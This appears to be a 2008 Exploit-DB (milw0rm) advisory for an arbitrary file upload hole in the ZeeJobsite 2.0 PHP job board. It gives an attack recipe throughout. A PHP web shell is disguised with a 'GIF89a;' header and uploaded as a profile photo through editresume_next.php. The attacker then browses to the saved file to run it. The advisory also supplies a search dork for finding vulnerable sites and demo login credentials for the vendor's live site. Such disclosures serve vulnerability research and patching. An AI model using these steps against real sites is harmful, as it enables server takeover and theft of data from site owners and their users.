Zeeways ZeeJobsite 2.0 - Arbitrary File Upload

EDB-ID:

7062


Author:

ZoRLu

Type:

webapps


Platform:

PHP

Date:

2008-11-08


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

ZEEJOBSITE v2.0 remote file Upload

author: ZoRLu msn: trt-turk@hotmail.com

home: www.z0rlu.blogspot.com

dork: "Copyright-2008@zeejobsite.com"

date: 08/11/2008 ( aha simdi gönderiyorum saat 10:40 : ) )


first register to site 

you add this code your shell to head 

GIF89a; 

example your_shell.php:

GIF89a;
<?

...

...

...

?>

and save your_sheell.php


after jobseekers login to site ( direckt link: localhost/jobseekers/jobseekerloginpage.php )

and you edit your profile ( direckt link: http://localhost/jobseekers/editresume_next.php?rid=[id] )

add your photo ( you_shell.php upload ) after open new page you right clik your photo and select to properties 

copy photo link and paste your explorer go your shell

your_shell:

localhost/script_path/jobseekers/logos/[id].php


example for demo:

user: sabrina

passwd: testing:

login: http://zeejobsite.com/jobseekers/jobseekerloginpage.php

change profile direckt link: http://zeejobsite.com/jobseekers/editresume_next.php?rid=47

and your_shell link:

http://zeejobsite.com/jobseekers/logos/7271406.php


thanks: str0ke & yildirimordulari.org  &  darkc0de.com

# milw0rm.com [2008-11-08]